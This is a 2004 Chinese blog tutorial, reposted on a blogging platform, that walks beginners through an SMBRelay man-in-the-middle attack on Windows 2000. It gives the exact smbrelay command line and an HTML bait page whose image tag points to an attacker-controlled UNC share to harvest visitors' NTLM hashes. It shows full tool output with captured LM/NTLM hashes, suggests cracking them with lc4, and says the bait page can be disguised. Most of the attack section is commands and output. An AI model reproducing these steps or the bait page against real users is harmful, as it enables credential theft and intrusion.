使用smbrelay进行中间人攻击

使用smbrelay进行中间人攻击
Submitted by 云舒 on 2004, July 7, 3:16 PM. 技术


最近使用smbrelay进行攻击很流行,我也赶时髦测试了一下,感谢xx2同志提高肉鸡,确实是个好同志呀。在这里,我就不写理论知识了,仅仅简单描述我的步骤,使比我还菜的鸟也能够一见中间人攻击的庐山真面目,现在简述如下:

1.虽然使用smbrelay攻击只需要2台机子,一台受害者A,一台攻击者B,但是却需要3个IP地址进行攻击。所以,要在控制面版中间再填加 一个ip地址C,IP地址C要和IP地址B在同个网段。为了避免IP地址冲突,要选择一个没有使用的IP地址。我是使用superscan扫描整个C类地 址,只ping就可以了。在这里,我的IP地址,也就是攻击者为XXX.92.45.18,虚拟的IP地址为XXX.92.45.19,受害者,也就是 xx2同志的IP地址是YYY.93.113.203。为了避免不必要的麻烦,我把IP地址都做了处理,这样,你好我也好!!:)

2.然后,使用smbrelay /E列举网卡,这里为1000004,然后输入C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19,其中/D为纠错等级,我这样翻译它吧,英语烂。默认是0,我用的1,中庸之道。/IL和/IR都是写网卡编号。/L+和/R- 是那个虚拟的ip地址c。显示如下:

C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19

SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack

Copyright 2001: Sir Dystic, Cult of the Dead Cow

Send complaints, ideas and donations to sirdystic@cultdeadcow.com

Using local adapter index 1000004: Intel(R) PRO Adapter

Error 52 adding IP address to interface 1000004: 网络上已有重复的名称

3.作好一个烂网页,代码如下:

< html>

< head>

< title>hash

< /head>

< body>

< img src="file://XXX.92.45.19/c$/hash.jpg">

< /body>

< /html>

其中XXX.92.45.19为你的虚拟ip。现在等受害者来访问它了,你就可以抓到它的LM hash和NTLM hash了,然后用lc4破解。其实这个页面你可以做的更好,让别人看不出来,这里我仅仅测试,就不用伪装了。听别人说可以直接net use:/XXX.92.45.19,还可以用psexec获得SHELL,我没有psexec,没有测试。

但是测试net use的时候显示:

C:/>net use /XXX.92.45.19
系统发生67错误

找不到网络路径

我也不知道为什么,哎……技术太菜了。抓的hash会以txt格式保存在smbrelay的目录里面。我得到的屏幕显示如下:

C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19

SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack

Copyright 2001: Sir Dystic, Cult of the Dead Cow

Send complaints, ideas and donations to sirdystic@cultdeadcow.com

Using local adapter index 1000004: Intel(R) PRO Adapter

Error 52 adding IP address to interface 1000004: 网络上已有重复的名称

Bound to port 139 on address XXX.92.45.19

Connection from YYY.93.113.203:2510

Request type: Session Request 72 bytes

Source name: JIANHUFENG <00>

Target name: *SMBSERVER <20>

Setting target name to source name and source name to 'CDC4EVER'...

Response: Positive Session Response 4 bytes

Request type: Session Message 137 bytes

SMB_COM_NEGOTIATE

Response: Session Message 123 bytes

Challenge (8 bytes): 726C02A8799402E7

Request type: Session Message 200 bytes

SMB_COM_SESSION_SETUP_ANDX

Password lengths: 1 0

Username: ""

Domain: ""

OS: ""

Lanman type: ""

???: ""

Response: Session Message 154 bytes

OS: "Windows 5.0"

Lanman type: "Windows 2000 LAN Manager"

Domain: "WORKGROUP"

Request type: Session Message 108 bytes

SMB_COM_TRANSACTION2

Response: Session Message 39 bytes

Request type: Session Message 274 bytes

SMB_COM_SESSION_SETUP_ANDX

Password lengths: 24 24

Case insensitive password:

780FAB7048A77950377C354428046698E94D34857E359CC3

Case sensitive password:

F3AD285B79DACDB857763ED78FA71B4CE0E4CE83C413D4FF

Username: "Guest"

Domain: "JIANHUFENG"

OS: "Windows 2000 2195"

Lanman type: "Windows 2000 5.0"

???: ""

Response: Session Message 154 bytes

OS: "Windows 5.0"

Lanman type: "Windows 2000 LAN Manager"

Domain: "WORKGROUP"

Password hash written to disk

Connected?

Bound to port 139 on address XXX.92.45.19 relaying for host

JIANHUFENG YYY.93.113.203

PS:我写这个文章的目的是因为有的人会这个,但是他们认为菜鸟不应该掌握这个,我很不爽,呵呵。本文参考了我们幻影的ciel的文章,它的文章发表在安全焦点http://www.xfocus.net/articles/200305/538.html ,大家可以去看看,他讲了很多理论知识的哦……

好了,我是灰色轨迹的云舒,欢迎大家转载,但是请保留出处,谢谢了。灰色轨迹地址http://www.isgrey.com ,我的邮箱wustyunshu@hotmail.com
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值